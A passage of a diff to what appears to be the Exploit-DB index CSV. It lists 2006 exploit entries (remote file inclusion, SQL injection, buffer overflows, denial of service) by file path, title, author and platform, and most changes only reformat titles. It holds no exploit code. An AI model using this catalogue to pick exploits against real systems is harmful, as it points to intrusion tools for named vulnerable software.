Inclusion",2006-05-07,OLiBekaS,php,webapps,0 +1765,platforms/php/webapps/1765.pl,"Dokeos Lms <= 1.6.4 - (authldap.php) Remote File Include Exploit",2006-05-08,beford,php,webapps,0 +1766,platforms/php/webapps/1766.pl,"Claroline e-Learning 1.75 - (ldap.inc.php) Remote File Inclusion Exploit",2006-05-08,beford,php,webapps,0 +1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server <= 8.23 - (rf) Remote File Include",2006-05-08,Aesthetico,php,webapps,0 +1768,platforms/php/webapps/1768.php,"ActualAnalyzer Pro <= 6.88 - (rf) Remote File Include Exploit",2006-05-08,ReZEN,php,webapps,0 1769,platforms/php/webapps/1769.txt,"phpListPro <= 2.01 - Multiple Remote File Include Vulnerabilities",2006-05-08,Aesthetico,php,webapps,0 1772,platforms/windows/local/1772.c,"Intel Wireless Service (s24evmon.exe) Shared Memory Exploit",2006-05-09,"Ruben Santamarta ",windows,local,0 -1773,platforms/php/webapps/1773.txt,"phpRaid <= 3.0.b3 (phpBB/SMF) Remote File Inclusion Vulnerabilities",2006-05-09,"Kurdish Security",php,webapps,0 -1774,platforms/php/webapps/1774.txt,"pafileDB <= 2.0.1 (mxBB/phpBB) Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0 -1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer <= 6.0.2900 SP2 (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0 +1773,platforms/php/webapps/1773.txt,"phpRaid <= 3.0.b3 - (phpBB/SMF) Remote File Inclusion Vulnerabilities",2006-05-09,"Kurdish Security",php,webapps,0 +1774,platforms/php/webapps/1774.txt,"pafileDB <= 2.0.1 - (mxBB/phpBB) Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0 +1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer <= 6.0.2900 SP2 - (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0 1776,platforms/windows/remote/1776.c,"Medal of Honor (getinfo) Remote Buffer Overflow Exploit",2006-05-10,RunningBon,windows,remote,12203 1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit",2006-05-11,rgod,php,webapps,0 -1778,platforms/php/webapps/1778.txt,"Foing <= 0.7.0 (phpBB) Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0 +1778,platforms/php/webapps/1778.txt,"Foing <= 0.7.0 - (phpBB) Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0 1779,platforms/php/webapps/1779.txt,"Php Blue Dragon CMS <= 2.9 - Remote File Include",2006-05-12,Kacper,php,webapps,0 -1780,platforms/php/webapps/1780.php,"phpBB <= 2.0.20 (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0 +1780,platforms/php/webapps/1780.php,"phpBB <= 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0 1781,platforms/windows/dos/1781.txt,"outgun <= 1.0.3 bot 2 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",windows,dos,0 1782,platforms/windows/dos/1782.txt,"Empire <= 4.3.2 - (strncat) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 1783,platforms/windows/dos/1783.txt,"Genecys <= 0.2 - (BoF/NULL pointer) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 1784,platforms/windows/dos/1784.txt,"raydium <= svn 309 - Multiple Vulnerabilities",2006-05-14,"Luigi Auriemma",windows,dos,0 -1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source <= 4.2 (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 +1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source <= 4.2 - (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 1787,platforms/windows/remote/1787.py,"freeSSHd <= 1.0.9 - Key Exchange Algorithm Buffer Overflow Exploit",2006-05-15,"Tauqeer Ahmad",windows,remote,22 1788,platforms/windows/remote/1788.pm,"PuTTy.exe <= 0.53 - (validation) Remote Buffer Overflow Exploit (Metasploit)",2006-05-15,y0,windows,remote,0 -1789,platforms/php/webapps/1789.txt,"TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion",2006-05-15,Kacper,php,webapps,0 -1790,platforms/php/webapps/1790.txt,"Squirrelcart <= 2.2.0 (cart_content.php) Remote Inclusion",2006-05-15,OLiBekaS,php,webapps,0 +1789,platforms/php/webapps/1789.txt,"TR Newsportal <= 0.36tr1 - (poll.php) Remote File Inclusion",2006-05-15,Kacper,php,webapps,0 +1790,platforms/php/webapps/1790.txt,"Squirrelcart <= 2.2.0 - (cart_content.php) Remote Inclusion",2006-05-15,OLiBekaS,php,webapps,0 1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900 1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d - (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0 -1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0 +1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 - (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0 1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass Exploit (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900 1795,platforms/php/webapps/1795.txt,"ezusermanager <= 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 -1796,platforms/php/webapps/1796.php,"PHP-Fusion <= 6.00.306 (srch_where) SQL Injection Exploit",2006-05-16,rgod,php,webapps,0 -1797,platforms/php/webapps/1797.php,"DeluxeBB <= 1.06 (Attachment mod_mime) Remote Exploit",2006-05-16,rgod,php,webapps,0 +1796,platforms/php/webapps/1796.php,"PHP-Fusion <= 6.00.306 - (srch_where) SQL Injection Exploit",2006-05-16,rgod,php,webapps,0 +1797,platforms/php/webapps/1797.php,"DeluxeBB <= 1.06 - (Attachment mod_mime) Remote Exploit",2006-05-16,rgod,php,webapps,0 1798,platforms/php/webapps/1798.txt,"Quezza BB <= 1.0 - (quezza_root_path) File Inclusion",2006-05-17,nukedx,php,webapps,0 1799,platforms/multiple/remote/1799.txt,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Scanner",2006-05-17,class101,multiple,remote,0 -1800,platforms/php/webapps/1800.txt,"ScozNews <= 1.2.1 (mainpath) Remote File Inclusion",2006-05-17,Kacper,php,webapps,0 +1800,platforms/php/webapps/1800.txt,"ScozNews <= 1.2.1 - (mainpath) Remote File Inclusion",2006-05-17,Kacper,php,webapps,0 1801,platforms/multiple/dos/1801.txt,"libextractor <= 0.5.13 - Multiple Heap Overflow PoC Exploits",2006-05-17,"Luigi Auriemma",multiple,dos,0 -1802,platforms/multiple/dos/1802.html,"Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit",2006-05-18,"Gianni Amato",multiple,dos,0 +1802,platforms/multiple/dos/1802.html,"Mozilla Firefox <= 1.5.0.3 - (Loop) Denial of Service Exploit",2006-05-18,"Gianni Amato",multiple,dos,0 1804,platforms/php/webapps/1804.txt,"phpBazar <= 2.1.0 - Remote (Include/Auth Bypass) Vulnerabilities",2006-05-19,[Oo],php,webapps,0 -1805,platforms/php/webapps/1805.pl,"phpListPro <= 2.0.1 (Language) Remote Code Execution Exploit",2006-05-19,[Oo],php,webapps,0 +1805,platforms/php/webapps/1805.pl,"phpListPro <= 2.0.1 - (Language) Remote Code Execution Exploit",2006-05-19,[Oo],php,webapps,0 1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - (.map) Local Arbitrary Code Execution Exploit",2006-05-19,Devil-00,windows,local,0 -1807,platforms/asp/webapps/1807.txt,"Zix Forum <= 1.12 (layid) SQL Injection",2006-05-19,FarhadKey,asp,webapps,0 -1808,platforms/php/webapps/1808.txt,"phpMyDirectory <= 10.4.4 (ROOT_PATH) Remote Inclusion",2006-05-19,OLiBekaS,php,webapps,0 -1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 (CLPath) Remote File Include Vulnerabilities",2006-05-20,Kacper,php,webapps,0 -1810,platforms/php/webapps/1810.pl,"Woltlab Burning Board <= 2.3.5 (links.php) SQL Injection Exploit",2006-05-20,666,php,webapps,0 +1807,platforms/asp/webapps/1807.txt,"Zix Forum <= 1.12 - (layid) SQL Injection",2006-05-19,FarhadKey,asp,webapps,0 +1808,platforms/php/webapps/1808.txt,"phpMyDirectory <= 10.4.4 - (ROOT_PATH) Remote Inclusion",2006-05-19,OLiBekaS,php,webapps,0 +1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - (CLPath) Remote File Include Vulnerabilities",2006-05-20,Kacper,php,webapps,0 +1810,platforms/php/webapps/1810.pl,"Woltlab Burning Board <= 2.3.5 - (links.php) SQL Injection Exploit",2006-05-20,666,php,webapps,0 1811,platforms/php/webapps/1811.php,"XOOPS <= 2.0.13.2 - xoopsOption[nocommon] Remote Exploit",2006-05-21,rgod,php,webapps,0 1812,platforms/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion (RFI)",2006-05-21,X0r_1,php,webapps,0 -1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit",2006-05-21,kingcope,linux,remote,110 -1814,platforms/php/webapps/1814.txt,"UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion",2006-05-22,V4mu,php,webapps,0 +1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow Exploit",2006-05-21,kingcope,linux,remote,110 +1814,platforms/php/webapps/1814.txt,"UBB Threads 6.4.x-6.5.2 - (thispath) Remote File Inclusion",2006-05-22,V4mu,php,webapps,0 1815,platforms/linux/dos/1815.c,"portmap 5 beta (Set/Dump) Local Denial of Service Exploit",2006-05-22,"Federico L. Bossi Bonin",linux,dos,0 -1816,platforms/php/webapps/1816.php,"Nucleus CMS <= 3.22 (DIR_LIBS) Arbitrary Remote Inclusion Exploit",2006-05-23,rgod,php,webapps,0 +1816,platforms/php/webapps/1816.php,"Nucleus CMS <= 3.22 - (DIR_LIBS) Arbitrary Remote Inclusion Exploit",2006-05-23,rgod,php,webapps,0 1817,platforms/php/webapps/1817.txt,"Docebo <= 3.0.3 - Multiple Remote File Include Vulnerabilities",2006-05-23,Kacper,php,webapps,0 1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar <= 4.0.3 - Multiple (XSS/SQL) Vulnerabilities",2006-05-23,X0r_1,php,webapps,0 1819,platforms/multiple/dos/1819.txt,"PunkBuster < 1.229 - (WebTool Service) Remote Buffer Overflow DoS",2006-05-23,"Luigi Auriemma",multiple,dos,0 1820,platforms/multiple/dos/1820.txt,"netPanzer 0.8 rev 952 - (frameNum) Server Terminiation Exploit",2006-05-23,"Luigi Auriemma",multiple,dos,0 -1821,platforms/php/webapps/1821.php,"Drupal <= 4.7 (attachment mod_mime) Remote Exploit",2006-05-24,rgod,php,webapps,0 +1821,platforms/php/webapps/1821.php,"Drupal <= 4.7 - (attachment mod_mime) Remote Exploit",2006-05-24,rgod,php,webapps,0 1823,platforms/php/webapps/1823.txt,"BASE <= 1.2.4 - melissa (Snort Frontend) Remote Inclusion Vulnerabilities",2006-05-25,str0ke,php,webapps,0 -1824,platforms/php/webapps/1824.txt,"open-medium.CMS <= 0.25 (404.php) Remote File Include",2006-05-25,Kacper,php,webapps,0 -1825,platforms/php/webapps/1825.txt,"Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include",2006-05-25,Kacper,php,webapps,0 -1826,platforms/php/webapps/1826.txt,"Socketmail <= 2.2.6 (site_path) Remote File Include",2006-05-25,Aesthetico,php,webapps,0 -1827,platforms/php/webapps/1827.txt,"V-Webmail <= 1.6.4 (pear_dir) Remote File Include",2006-05-25,beford,php,webapps,0 -1828,platforms/php/webapps/1828.txt,"DoceboLms <= 2.0.5 (help.php) Remote File Include",2006-05-25,beford,php,webapps,0 +1824,platforms/php/webapps/1824.txt,"open-medium.CMS <= 0.25 - (404.php) Remote File Include",2006-05-25,Kacper,php,webapps,0 +1825,platforms/php/webapps/1825.txt,"Back-End CMS <= 0.7.2.2 - (BE_config.php) Remote Include",2006-05-25,Kacper,php,webapps,0 +1826,platforms/php/webapps/1826.txt,"Socketmail <= 2.2.6 - (site_path) Remote File Include",2006-05-25,Aesthetico,php,webapps,0 +1827,platforms/php/webapps/1827.txt,"V-Webmail <= 1.6.4 - (pear_dir) Remote File Include",2006-05-25,beford,php,webapps,0 +1828,platforms/php/webapps/1828.txt,"DoceboLms <= 2.0.5 - (help.php) Remote File Include",2006-05-25,beford,php,webapps,0 1829,platforms/php/webapps/1829.txt,"APC ActionApps CMS 2.8.1 - Remote File Include Vulnerabilities",2006-05-25,Kacper,php,webapps,0 1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff <= 3.8.2) - Local Stack Buffer Overflow PoC",2006-05-26,nitr0us,linux,local,0 -1832,platforms/php/webapps/1832.txt,"Plume CMS <= 1.0.3 (manager_path) Remote File Include",2006-05-26,beford,php,webapps,0 +1832,platforms/php/webapps/1832.txt,"Plume CMS <= 1.0.3 - (manager_path) Remote File Include",2006-05-26,beford,php,webapps,0 1833,platforms/asp/webapps/1833.txt,"qjForum (member.asp) SQL Injection",2006-05-26,ajann,asp,webapps,0 1834,platforms/asp/webapps/1834.asp,"Easy-Content Forums 1.0 - Multiple SQL/XSS Vulnerabilities",2006-05-26,ajann,asp,webapps,0 1835,platforms/php/webapps/1835.txt,"Hot Open Tickets <= 11012004 - (CLASS_PATH) Remote Include",2006-05-27,Kacper,php,webapps,0 -1836,platforms/asp/webapps/1836.txt,"PrideForum 1.0 (forum.asp) Remote SQL Injection",2006-05-27,ajann,asp,webapps,0 +1836,platforms/asp/webapps/1836.txt,"PrideForum 1.0 - (forum.asp) Remote SQL Injection",2006-05-27,ajann,asp,webapps,0 1837,platforms/asp/webapps/1837.pl,"MiniNuke 2.x - (create an admin) Remote SQL Injection Exploit",2006-05-27,nukedx,asp,webapps,0 1838,platforms/windows/dos/1838.html,"Microsoft Internet Explorer - (HTML Tag) Memory Corruption (MS06-013)",2006-05-27,"Thomas Waldegger",windows,dos,0 1839,platforms/php/webapps/1839.txt,"tinyBB <= 0.3 - Remote (Include / SQL Injection) Vulnerabilities",2006-05-28,nukedx,php,webapps,0 @@ -1554,68 +1554,68 @@ id,file,description,date,author,platform,type,port 1843,platforms/php/webapps/1843.txt,"UBB Threads 5.x / 6.x - Multiple Remote File Inclusion Vulnerabilities",2006-05-28,nukedx,php,webapps,0 1844,platforms/php/webapps/1844.txt,"Activity MOD Plus <= 1.1.0 - (phpBB Mod) File Inclusion",2006-05-28,nukedx,php,webapps,0 1845,platforms/asp/webapps/1845.txt,"ASPSitem <= 2.0 - Remote (SQL Injection / DB Disclosure) Vulnerabilities",2006-05-28,nukedx,asp,webapps,0 -1846,platforms/php/webapps/1846.txt,"Blend Portal <= 1.2.0 (phpBB Mod) Remote File Inclusion",2006-05-28,nukedx,php,webapps,0 +1846,platforms/php/webapps/1846.txt,"Blend Portal <= 1.2.0 - (phpBB Mod) Remote File Inclusion",2006-05-28,nukedx,php,webapps,0 1847,platforms/php/webapps/1847.txt,"CosmicShoppingCart (search.php) Remote SQL Injection",2006-05-28,Vympel,php,webapps,0 1848,platforms/php/webapps/1848.txt,"Fastpublish CMS 1.6.9 - config[fsBase] Remote Include Vulnerabilities",2006-05-29,Kacper,php,webapps,0 1849,platforms/asp/webapps/1849.htm,"Speedy ASP Forum (profileupdate.asp) User Pass Change Exploit",2006-05-29,ajann,asp,webapps,0 1850,platforms/asp/webapps/1850.htm,"Nukedit CMS <= 4.9.6 Unauthorized Admin Add Exploit",2006-05-29,FarhadKey,asp,webapps,0 -1851,platforms/php/webapps/1851.txt,"gnopaste <= 0.5.3 (common.php) Remote File Include",2006-05-30,SmokeZ,php,webapps,0 -1852,platforms/linux/dos/1852.c,"gxine 0.5.6 (HTTP Plugin) Remote Buffer Overflow PoC",2006-05-30,"Federico L. Bossi Bonin",linux,dos,0 -1853,platforms/php/webapps/1853.php,"pppBlog <= 0.3.8 (randompic.php) System Disclosure Exploit",2006-05-31,rgod,php,webapps,0 -1854,platforms/php/webapps/1854.txt,"Ottoman CMS <= 1.1.3 (default_path) Remote File Include Vulnerabilities",2006-05-31,Kacper,php,webapps,0 -1855,platforms/php/webapps/1855.txt,"metajour 2.1 (system_path) Remote File Include Vulnerabilities",2006-05-31,Kacper,php,webapps,0 +1851,platforms/php/webapps/1851.txt,"gnopaste <= 0.5.3 - (common.php) Remote File Include",2006-05-30,SmokeZ,php,webapps,0 +1852,platforms/linux/dos/1852.c,"gxine 0.5.6 - (HTTP Plugin) Remote Buffer Overflow PoC",2006-05-30,"Federico L. Bossi Bonin",linux,dos,0 +1853,platforms/php/webapps/1853.php,"pppBlog <= 0.3.8 - (randompic.php) System Disclosure Exploit",2006-05-31,rgod,php,webapps,0 +1854,platforms/php/webapps/1854.txt,"Ottoman CMS <= 1.1.3 - (default_path) Remote File Include Vulnerabilities",2006-05-31,Kacper,php,webapps,0 +1855,platforms/php/webapps/1855.txt,"metajour 2.1 - (system_path) Remote File Include Vulnerabilities",2006-05-31,Kacper,php,webapps,0 1856,platforms/windows/dos/1856.url,"Microsoft Internet Explorer (inetconn.dll) Stack Overflow Crash",2006-05-31,Mr.Niega,windows,dos,0 -1857,platforms/php/webapps/1857.pl,"TinyPHP Forum <= 3.6 (profile.php) Remote Code Execution Exploit",2006-06-01,Hessam-x,php,webapps,0 -1858,platforms/php/webapps/1858.txt,"AssoCIateD CMS 1.1.3 (root_path) Remote File Include",2006-06-01,Kacper,php,webapps,0 +1857,platforms/php/webapps/1857.pl,"TinyPHP Forum <= 3.6 - (profile.php) Remote Code Execution Exploit",2006-06-01,Hessam-x,php,webapps,0 +1858,platforms/php/webapps/1858.txt,"AssoCIateD CMS 1.1.3 - (root_path) Remote File Include",2006-06-01,Kacper,php,webapps,0 1859,platforms/asp/webapps/1859.htm,"aspWebLinks 2.0 - Remote SQL Injection / Admin Pass Change Exploit",2006-06-01,ajann,asp,webapps,0 1860,platforms/php/webapps/1860.txt,"Bytehoard 2.1 - (server.php) Remote File Include",2006-06-01,beford,php,webapps,0 -1861,platforms/php/webapps/1861.txt,"Redaxo CMS <= 3.2 (INCLUDE_PATH) Remote File Include Vulnerabilities",2006-06-02,beford,php,webapps,0 +1861,platforms/php/webapps/1861.txt,"Redaxo CMS <= 3.2 - (INCLUDE_PATH) Remote File Include Vulnerabilities",2006-06-02,beford,php,webapps,0 1862,platforms/cgi/webapps/1862.c,"iShopCart vGetPost() Remote Buffer Overflow Exploit (cgi)",2006-06-02,K-sPecial,cgi,webapps,0 -1863,platforms/php/webapps/1863.txt,"Igloo <= 0.1.9 (Wiki.php) Remote File Include",2006-06-02,Kacper,php,webapps,0 -1864,platforms/php/webapps/1864.txt,"ashNews 0.83 (pathtoashnews) Remote File Include Vulnerabilities",2006-06-02,Kacper,php,webapps,0 -1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 (common-menu.php) Remote File Include Vulnerabilities",2006-06-02,Kacper,php,webapps,0 +1863,platforms/php/webapps/1863.txt,"Igloo <= 0.1.9 - (Wiki.php) Remote File Include",2006-06-02,Kacper,php,webapps,0 +1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Include Vulnerabilities",2006-06-02,Kacper,php,webapps,0 +1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 - (common-menu.php) Remote File Include Vulnerabilities",2006-06-02,Kacper,php,webapps,0 1866,platforms/php/webapps/1866.txt,"PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions",2006-06-02,ddoshomo,php,webapps,0 -1867,platforms/multiple/dos/1867.html,"Mozilla Firefox <= 1.5.0.4 (marquee) Denial of Service Exploit",2006-06-02,n00b,multiple,dos,0 +1867,platforms/multiple/dos/1867.html,"Mozilla Firefox <= 1.5.0.4 - (marquee) Denial of Service Exploit",2006-06-02,n00b,multiple,dos,0 1868,platforms/php/webapps/1868.php,"Pixelpost <= 1-5rc1-2 - Remote Privilege Escalation Exploit",2006-06-03,rgod,php,webapps,0 -1869,platforms/php/webapps/1869.php,"DotClear <= 1.2.4 (prepend.php) Arbitrary Remote Inclusion Exploit",2006-06-03,rgod,php,webapps,0 +1869,platforms/php/webapps/1869.php,"DotClear <= 1.2.4 - (prepend.php) Arbitrary Remote Inclusion Exploit",2006-06-03,rgod,php,webapps,0 1870,platforms/php/webapps/1870.txt,"BlueShoes Framework <= 4.6 - Remote File Include Vulnerabilities",2006-06-03,Kacper,php,webapps,0 -1871,platforms/php/webapps/1871.txt,"WebspotBlogging <= 3.0.1 (path) Remote File Include",2006-06-03,Kacper,php,webapps,0 +1871,platforms/php/webapps/1871.txt,"WebspotBlogging <= 3.0.1 - (path) Remote File Include",2006-06-03,Kacper,php,webapps,0 1872,platforms/php/webapps/1872.txt,"CS-Cart <= 1.3.3 - (classes_dir) Remote File Include",2006-06-03,Kacper,php,webapps,0 -1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 (catid) Remote SQL Injection",2006-06-03,FarhadKey,asp,webapps,0 +1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - (catid) Remote SQL Injection",2006-06-03,FarhadKey,asp,webapps,0 1874,platforms/php/webapps/1874.php,"LifeType <= 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit",2006-06-03,rgod,php,webapps,0 -1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0 -1876,platforms/php/webapps/1876.pl,"SCart 2.0 (page) Remote Code Execution Exploit",2006-06-04,K-159,php,webapps,0 -1877,platforms/php/webapps/1877.php,"Claroline <= 1.7.6 (includePath) Remote Code Execution Exploit",2006-06-05,rgod,php,webapps,0 +1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 - (profile.php) Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0 +1876,platforms/php/webapps/1876.pl,"SCart 2.0 - (page) Remote Code Execution Exploit",2006-06-04,K-159,php,webapps,0 +1877,platforms/php/webapps/1877.php,"Claroline <= 1.7.6 - (includePath) Remote Code Execution Exploit",2006-06-05,rgod,php,webapps,0 1878,platforms/php/webapps/1878.txt,"Particle Wiki <= 1.0.2 - Remote SQL Injection",2006-06-05,FarhadKey,php,webapps,0 -1879,platforms/php/webapps/1879.txt,"dotWidget CMS <= 1.0.6 (file_path) Remote File Include Vulnerabilities",2006-06-05,Aesthetico,php,webapps,0 +1879,platforms/php/webapps/1879.txt,"dotWidget CMS <= 1.0.6 - (file_path) Remote File Include Vulnerabilities",2006-06-05,Aesthetico,php,webapps,0 1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit",2006-06-05,"ECL Labs",linux,dos,0 -1881,platforms/php/webapps/1881.txt,"DreamAccount <= 3.1 (da_path) Remote File Include Vulnerabilities",2006-06-05,Aesthetico,php,webapps,0 +1881,platforms/php/webapps/1881.txt,"DreamAccount <= 3.1 - (da_path) Remote File Include Vulnerabilities",2006-06-05,Aesthetico,php,webapps,0 1882,platforms/php/webapps/1882.pl,"Dmx Forum <= 2.1a (edit.php) Remote Password Disclosure Exploit",2006-06-05,DarkFig,php,webapps,0 -1883,platforms/php/webapps/1883.txt,"Wikiwig <= 4.1 (wk_lang.php) Remote File Include",2006-06-06,Kacper,php,webapps,0 -1884,platforms/asp/webapps/1884.htm,"myNewsletter <= 1.1.2 (adminLogin.asp) Login Bypass Exploit",2006-06-06,FarhadKey,asp,webapps,0 -1885,platforms/windows/remote/1885.pl,"QBik Wingate 6.1.1.1077 (POST) Remote Buffer Overflow Exploit",2006-06-07,kingcope,windows,remote,80 -1886,platforms/php/webapps/1886.txt,"OpenEMR <= 2.8.1 (fileroot) Remote File Include",2006-06-07,Kacper,php,webapps,0 -1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News <= 1.0 (post.php) Remote File Include",2006-06-07,Kacper,php,webapps,0 -1888,platforms/php/webapps/1888.txt,"Back-End CMS <= 0.7.2.1 (jpcache.php) Remote Include",2006-06-08,"Federico Fazzi",php,webapps,0 +1883,platforms/php/webapps/1883.txt,"Wikiwig <= 4.1 - (wk_lang.php) Remote File Include",2006-06-06,Kacper,php,webapps,0 +1884,platforms/asp/webapps/1884.htm,"myNewsletter <= 1.1.2 - (adminLogin.asp) Login Bypass Exploit",2006-06-06,FarhadKey,asp,webapps,0 +1885,platforms/windows/remote/1885.pl,"QBik Wingate 6.1.1.1077 - (POST) Remote Buffer Overflow Exploit",2006-06-07,kingcope,windows,remote,80 +1886,platforms/php/webapps/1886.txt,"OpenEMR <= 2.8.1 - (fileroot) Remote File Include",2006-06-07,Kacper,php,webapps,0 +1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News <= 1.0 - (post.php) Remote File Include",2006-06-07,Kacper,php,webapps,0 +1888,platforms/php/webapps/1888.txt,"Back-End CMS <= 0.7.2.1 - (jpcache.php) Remote Include",2006-06-08,"Federico Fazzi",php,webapps,0 1889,platforms/hardware/remote/1889.txt,"D-Link Access-Point <= 2.10na - (DWL Series) Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0 -1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities",2006-06-08,"Federico Fazzi",php,webapps,0 -1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems <= 1.1 (footer) Remote Include",2006-06-08,Kacper,php,webapps,0 -1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0 +1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 - (spaw_root) Remote File Include Vulnerabilities",2006-06-08,"Federico Fazzi",php,webapps,0 +1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems <= 1.1 - (footer) Remote Include",2006-06-08,Kacper,php,webapps,0 +1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 - (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0 1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise <= 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0 1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0 -1895,platforms/php/webapps/1895.txt,"empris <= r20020923 (phormationdir) Remote Include",2006-06-10,Kacper,php,webapps,0 +1895,platforms/php/webapps/1895.txt,"empris <= r20020923 - (phormationdir) Remote Include",2006-06-10,Kacper,php,webapps,0 1896,platforms/php/webapps/1896.txt,"aePartner <= 0.8.3 - (dir[data]) Remote Include",2006-06-10,Kacper,php,webapps,0 1897,platforms/php/webapps/1897.txt,"phpOnDirectory <= 1.0 - Remote File Include Vulnerabilities",2006-06-10,Kacper,php,webapps,0 -1898,platforms/php/webapps/1898.txt,"WebprojectDB <= 0.1.3 (INCDIR) Remote File Include",2006-06-11,Kacper,php,webapps,0 -1899,platforms/php/webapps/1899.txt,"free QBoard <= 1.1 (qb_path) Remote File Include",2006-06-11,Kacper,php,webapps,0 -1900,platforms/asp/webapps/1900.txt,"MaxiSepet <= 1.0 (link) SQL Injection",2006-06-11,nukedx,asp,webapps,0 -1901,platforms/php/webapps/1901.pl,"RCblog <= 1.03 (post) Remote Command Execution Exploit",2006-06-11,Hessam-x,php,webapps,0 +1898,platforms/php/webapps/1898.txt,"WebprojectDB <= 0.1.3 - (INCDIR) Remote File Include",2006-06-11,Kacper,php,webapps,0 +1899,platforms/php/webapps/1899.txt,"free QBoard <= 1.1 - (qb_path) Remote File Include",2006-06-11,Kacper,php,webapps,0 +1900,platforms/asp/webapps/1900.txt,"MaxiSepet <= 1.0 - (link) SQL Injection",2006-06-11,nukedx,asp,webapps,0 +1901,platforms/php/webapps/1901.pl,"RCblog <= 1.03 - (post) Remote Command Execution Exploit",2006-06-11,Hessam-x,php,webapps,0 1902,platforms/php/webapps/1902.txt,"AWF CMS 1.11 - (spaw_root) Remote File Include",2006-06-11,"Federico Fazzi",php,webapps,0 1903,platforms/php/webapps/1903.txt,"Content-Builder (CMS) 0.7.5 - Multiple Include Vulnerabilities",2006-06-11,"Federico Fazzi",php,webapps,0 -1904,platforms/php/webapps/1904.php,"blur6ex <= 0.3.462 (ID) Admin Disclosure / Blind SQL Injection Exploit",2006-06-12,rgod,php,webapps,0 -1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x (root) Remote File Include",2006-06-12,"Federico Fazzi",php,webapps,0 +1904,platforms/php/webapps/1904.php,"blur6ex <= 0.3.462 - (ID) Admin Disclosure / Blind SQL Injection Exploit",2006-06-12,rgod,php,webapps,0 +1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x - (root) Remote File Include",2006-06-12,"Federico Fazzi",php,webapps,0 1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow Exploit",2006-06-12,h07,windows,remote,0 -1907,platforms/php/webapps/1907.txt,"aWebNews <= 1.5 (visview.php) Remote File Include",2006-06-13,SpC-x,php,webapps,0 